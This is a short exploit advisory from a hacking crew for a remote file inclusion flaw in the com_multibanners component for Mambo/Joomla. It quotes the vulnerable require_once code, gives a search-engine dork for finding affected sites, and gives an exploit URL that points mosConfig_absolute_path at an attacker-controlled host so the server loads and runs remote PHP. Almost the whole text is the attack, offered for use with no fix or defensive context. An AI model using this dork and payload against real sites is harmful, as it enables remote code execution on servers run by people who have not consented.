#############################SolpotCrew Community################################ # # Com Multibanners Remote File Inclusion (mosConfig_absolute_path) # # original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt # ######################################################################## ######### # # # Bug Found By :Blue|Spy # # contact: mail (at) blue-spy (dot) net [email concealed] # # Website : http://kunamgede.biz, http://blue-spy.net # ######################################################################## ######## # # # Greetz: h4ntu , Fungky, Solpot, Matdhule # and all crew #mardongan @ irc.dal.net # # ######################################################################## ####### code from extadminmenus.class.php if (phpversion() < '4.2.0') { require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' ); } if (phpversion() < '4.3.0') { require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' ); } Dork: inurl:com_multibanners exploit: http://site.com/[path]//administrator/components/com_multibanners/extadm inmenus.class.php?mosConfig_absolute_path=[attacker] ##############################MY LOVE JUST FOR U LIENA######################### ########################################################################